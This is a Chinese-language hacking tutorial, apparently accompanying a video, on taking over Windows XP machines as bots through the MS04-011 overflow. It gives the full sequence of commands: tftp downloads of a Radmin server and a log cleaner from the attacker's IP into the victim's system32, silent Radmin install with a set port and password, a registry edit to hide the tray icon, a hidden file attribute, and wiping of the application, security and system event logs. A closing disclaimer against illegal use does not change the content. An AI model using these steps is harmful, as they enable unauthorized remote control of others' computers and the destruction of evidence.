开着你的防火墙，一般有机器疯狂你给你的某个端口发数据，那么那个机器很可能是有ms04011溢出漏洞的，呵呵，这个漏洞经历时间这么长还有的鸡抓，真是不简单啊！记得刚开始的时候成功率奇高，现在改良了一点，不过也没有到找不到肉鸡的地步！<br>
<br>
2.ms04011的用法就不用说了，谁不会就去google查！<br>
  先用DDscn扫描肉鸡，我已经扫好了！<br>
  利用ms04011溢出，得到对方的cmd！<br>
<br>
3.tftp的用户解释：[不好意思，刚才掉线了，重新拨号了一次，IP变了]<br>
为了方便.现在写下来一个例子:  222.135.62.100是我的IP!<br>
Tftp -i 222.135.59.32 get admdll.dll      <br>
Tftp -i 222.135.59.32 get r_server.exe<br>
Tftp -i 222.135.59.32 get hoky.reg<br>
Tftp -i 222.135.59.32 get clearlogs.exe<br>
机器好卡啊！好了，我们要用的东西已经传到对方的sysytem32目录下<br>
，下面我们给对方安装radmin服务端，因为我估计对方是专业版，我先看看，对了，就是xp的，所以，我们还是给他安装radmin吧！<br>
<br>
<br>
4.radmin的用法：<br>
>SYSTEN32>r_server /install /silence                                  //安装radmin服务端<br>
>SYSTEN32>r_server.exe /port:3721 /pass:hoky /save /silence         //设置参数<br>
>SYSTEN32>regedit.exe /s hoky.reg  [注意:xp是regedt32.exe /s hoky.reg]  //系统托盘不显示<br>
>SYSTEN32>net start r_server                                            //启动服务<br>
>SYSTEN32>del hoky.reg [一般都是拒绝访问，之后可以删除!]                //删除<br>
>SYSTEN32>attrib.exe +h r_server.exe                                    //设置r_server属性<br>
<br>
<br>
radmin安装好了<br>
我们应该扫地了！<br>
<br>
4. clearlogos的使用：<br>
clearlogs -app   清除远程计算机的应用程序日志<br>
clearlogs -sec   清除远程计算机的安全日志<br>
clearlogs -sys   清除远程计算机的系统日志<br>
<br>
还有那个hoky。reg没有删除，我们一会通过文件管理删除就可以了！<br>
<br>
其他具体操作请看动画!<br>
<br>
<br>
制作:Hoky.pRo<br>
QQ:29036788<br>
Email:Hoky.pRo@163.com<br>
主页:www.hoky.org [特络纳小黑站点]<br>
<br>
特络纳声明：所著本站动画你可以随便转载，版权所有，违者不究！<br>
但是请务必保留本站的版权信息,违者必黑 ^(-_-)^  [开玩笑的,I很菜!]  <br>
请勿利用本站动画做违反法律的事情！否则后果自负！ 爱国者安全网提醒您：
动画内附广告纯属个人宣传，网络交易，风险自担。